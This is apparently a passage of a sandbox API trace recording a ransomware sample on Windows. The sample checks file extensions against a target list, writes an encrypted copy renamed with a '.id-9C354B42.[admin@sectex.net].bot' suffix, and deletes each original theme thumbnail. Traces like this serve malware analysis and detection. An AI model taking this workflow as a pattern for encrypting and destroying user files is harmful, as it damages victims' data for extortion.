	[0045.592] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0045.592] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73
	[0045.592] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73
	[0045.593] lstrlenW (lpString=".doc") returned 4
	[0045.593] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0045.593] lstrlenW (lpString=".docx") returned 5
	[0045.593] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0045.593] lstrlenW (lpString=".pdf") returned 4
	[0045.593] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0045.593] lstrlenW (lpString=".xls") returned 4
	[0045.593] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0045.593] lstrlenW (lpString=".xlsx") returned 5
	[0045.593] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0045.593] lstrlenW (lpString=".ppt") returned 4
	[0045.593] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0045.593] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73
	[0045.593] lstrlenW (lpString=".zip") returned 4
	[0045.593] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0045.593] lstrlenW (lpString=".rar") returned 4
	[0045.593] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0045.593] lstrlenW (lpString=".bz2") returned 4
	[0045.593] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0045.593] lstrlenW (lpString=".7z") returned 3
	[0045.593] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0045.593] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73
	[0045.593] lstrlenW (lpString=".dbf") returned 4
	[0045.593] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0045.593] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73
	[0045.593] lstrlenW (lpString=".1cd") returned 4
	[0045.593] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0045.593] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73
	[0045.593] lstrlenW (lpString=".jpg") returned 4
	[0045.593] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0045.594] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0045.594] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0045.594] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224
	[0046.609] GetFileSizeEx (in: hFile=0x224, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=31975) returned 1
	[0046.609] CloseHandle (hObject=0x224) returned 1
	[0046.609] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png")) returned 0x20
	[0046.609] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0046.609] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224
	[0046.609] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.609] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.609] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0046.610] GetLastError () returned 0x0
	[0046.610] ReadFile (in: hFile=0x224, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x7ce7, lpOverlapped=0x0) returned 1
	[0046.754] WriteFile (in: hFile=0x1cc, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x7cf0, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x7cf0, lpOverlapped=0x0) returned 1
	[0046.755] ReadFile (in: hFile=0x224, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0046.755] WriteFile (in: hFile=0x1cc, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0046.755] SetEndOfFile (hFile=0x1cc) returned 1
	[0046.755] CloseHandle (hObject=0x1cc) returned 1
	[0046.756] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.756] SetEndOfFile (hFile=0x224) returned 1
	[0046.756] CloseHandle (hObject=0x224) returned 1
	[0046.757] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0046.757] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png")) returned 1
	[0046.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75
	[0046.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75
	[0046.757] lstrlenW (lpString=".doc") returned 4
	[0046.757] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0046.757] lstrlenW (lpString=".docx") returned 5
	[0046.757] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0046.757] lstrlenW (lpString=".pdf") returned 4
	[0046.757] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0046.757] lstrlenW (lpString=".xls") returned 4
	[0046.757] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0046.757] lstrlenW (lpString=".xlsx") returned 5
	[0046.757] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0046.757] lstrlenW (lpString=".ppt") returned 4
	[0046.757] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0046.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75
	[0046.758] lstrlenW (lpString=".zip") returned 4
	[0046.758] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0046.758] lstrlenW (lpString=".rar") returned 4
	[0046.758] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0046.758] lstrlenW (lpString=".bz2") returned 4
	[0046.758] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0046.758] lstrlenW (lpString=".7z") returned 3
	[0046.758] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0046.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75
	[0046.758] lstrlenW (lpString=".dbf") returned 4
	[0046.758] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0046.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75
	[0046.758] lstrlenW (lpString=".1cd") returned 4
	[0046.758] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0046.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75
	[0046.758] lstrlenW (lpString=".jpg") returned 4
	[0046.758] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0046.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75
	[0046.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75
	[0046.758] lstrlenW (lpString=".doc") returned 4
	[0046.758] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0046.758] lstrlenW (lpString=".docx") returned 5
	[0046.758] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0046.758] lstrlenW (lpString=".pdf") returned 4
	[0046.758] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0046.758] lstrlenW (lpString=".xls") returned 4
	[0046.758] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0046.758] lstrlenW (lpString=".xlsx") returned 5
	[0046.758] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0046.758] lstrlenW (lpString=".ppt") returned 4
	[0046.758] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0046.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75
	[0046.759] lstrlenW (lpString=".zip") returned 4
	[0046.759] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0046.759] lstrlenW (lpString=".rar") returned 4
	[0046.759] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0046.759] lstrlenW (lpString=".bz2") returned 4
	[0046.759] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0046.759] lstrlenW (lpString=".7z") returned 3
	[0046.759] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0046.759] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75
	[0046.759] lstrlenW (lpString=".dbf") returned 4
	[0046.759] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0046.759] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75
	[0046.759] lstrlenW (lpString=".1cd") returned 4
	[0046.759] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0046.759] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75
	[0046.759] lstrlenW (lpString=".jpg") returned 4
	[0046.759] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0046.759] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0046.759] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0046.759] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200
	[0047.668] GetFileSizeEx (in: hFile=0x200, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=34163) returned 1
	[0047.668] CloseHandle (hObject=0x200) returned 1
	[0047.668] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png")) returned 0x20
	[0047.668] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0047.668] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200
	[0047.668] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.668] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.668] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0047.668] GetLastError () returned 0x0
	[0047.668] ReadFile (in: hFile=0x200, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x8573, lpOverlapped=0x0) returned 1
	[0047.671] WriteFile (in: hFile=0x1f0, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x8580, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x8580, lpOverlapped=0x0) returned 1
	[0047.672] ReadFile (in: hFile=0x200, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0047.672] WriteFile (in: hFile=0x1f0, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0047.672] SetEndOfFile (hFile=0x1f0) returned 1
	[0047.672] CloseHandle (hObject=0x1f0) returned 1
	[0047.672] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.672] SetEndOfFile (hFile=0x200) returned 1
	[0047.673] CloseHandle (hObject=0x200) returned 1
	[0047.674] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0047.674] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png")) returned 1
	[0047.674] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74
	[0047.674] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74
	[0047.674] lstrlenW (lpString=".doc") returned 4
	[0047.674] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0047.674] lstrlenW (lpString=".docx") returned 5
	[0047.674] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0047.674] lstrlenW (lpString=".pdf") returned 4
	[0047.674] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0047.674] lstrlenW (lpString=".xls") returned 4
	[0047.674] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0047.674] lstrlenW (lpString=".xlsx") returned 5
	[0047.674] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0047.674] lstrlenW (lpString=".ppt") returned 4
	[0047.674] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0047.674] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74
	[0047.674] lstrlenW (lpString=".zip") returned 4
	[0047.675] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0047.675] lstrlenW (lpString=".rar") returned 4
	[0047.675] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0047.675] lstrlenW (lpString=".bz2") returned 4
	[0047.675] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0047.675] lstrlenW (lpString=".7z") returned 3
	[0047.675] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0047.675] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74
	[0047.675] lstrlenW (lpString=".dbf") returned 4
	[0047.675] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0047.675] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74
	[0047.675] lstrlenW (lpString=".1cd") returned 4
	[0047.675] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0047.675] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74
	[0047.675] lstrlenW (lpString=".jpg") returned 4
	[0047.675] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0047.675] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74
	[0047.675] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74
	[0047.675] lstrlenW (lpString=".doc") returned 4
	[0047.675] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0047.675] lstrlenW (lpString=".docx") returned 5
	[0047.675] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0047.675] lstrlenW (lpString=".pdf") returned 4
	[0047.675] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0047.675] lstrlenW (lpString=".xls") returned 4
	[0047.675] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0047.675] lstrlenW (lpString=".xlsx") returned 5
	[0047.675] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0047.675] lstrlenW (lpString=".ppt") returned 4
	[0047.675] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0047.675] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74
	[0047.675] lstrlenW (lpString=".zip") returned 4
	[0047.676] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0047.676] lstrlenW (lpString=".rar") returned 4
	[0047.676] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0047.676] lstrlenW (lpString=".bz2") returned 4
	[0047.676] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0047.676] lstrlenW (lpString=".7z") returned 3
	[0047.676] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0047.676] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74
	[0047.676] lstrlenW (lpString=".dbf") returned 4
	[0047.676] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0047.676] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74
	[0047.676] lstrlenW (lpString=".1cd") returned 4
	[0047.676] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0047.676] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74
	[0047.676] lstrlenW (lpString=".jpg") returned 4
	[0047.676] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0047.676] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0047.676] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0047.676] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0047.913] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=21812) returned 1
	[0047.934] CloseHandle (hObject=0x1a8) returned 1
	[0047.934] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png")) returned 0x20
	[0047.934] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0047.934] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0047.934] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.934] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.934] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0047.934] GetLastError () returned 0x0
	[0047.934] ReadFile (in: hFile=0x1a8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x5534, lpOverlapped=0x0) returned 1
	[0047.936] WriteFile (in: hFile=0x1f8, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x5540, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x5540, lpOverlapped=0x0) returned 1
	[0047.937] ReadFile (in: hFile=0x1a8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0047.937] WriteFile (in: hFile=0x1f8, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0047.937] SetEndOfFile (hFile=0x1f8) returned 1
	[0047.937] CloseHandle (hObject=0x1f8) returned 1
	[0047.938] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0047.938] SetEndOfFile (hFile=0x1a8) returned 1
	[0047.938] CloseHandle (hObject=0x1a8) returned 1
	[0047.939] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0047.939] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png")) returned 1
	[0047.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75
	[0047.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75
	[0047.939] lstrlenW (lpString=".doc") returned 4
	[0047.939] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0047.939] lstrlenW (lpString=".docx") returned 5
	[0047.939] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0047.939] lstrlenW (lpString=".pdf") returned 4
	[0047.939] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0047.939] lstrlenW (lpString=".xls") returned 4
	[0047.939] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0047.939] lstrlenW (lpString=".xlsx") returned 5
	[0047.939] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0047.939] lstrlenW (lpString=".ppt") returned 4
	[0047.939] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0047.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75
	[0047.939] lstrlenW (lpString=".zip") returned 4
	[0047.939] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0047.939] lstrlenW (lpString=".rar") returned 4
	[0047.939] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0047.940] lstrlenW (lpString=".bz2") returned 4
	[0047.940] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0047.940] lstrlenW (lpString=".7z") returned 3
	[0047.940] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0047.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75
	[0047.940] lstrlenW (lpString=".dbf") returned 4
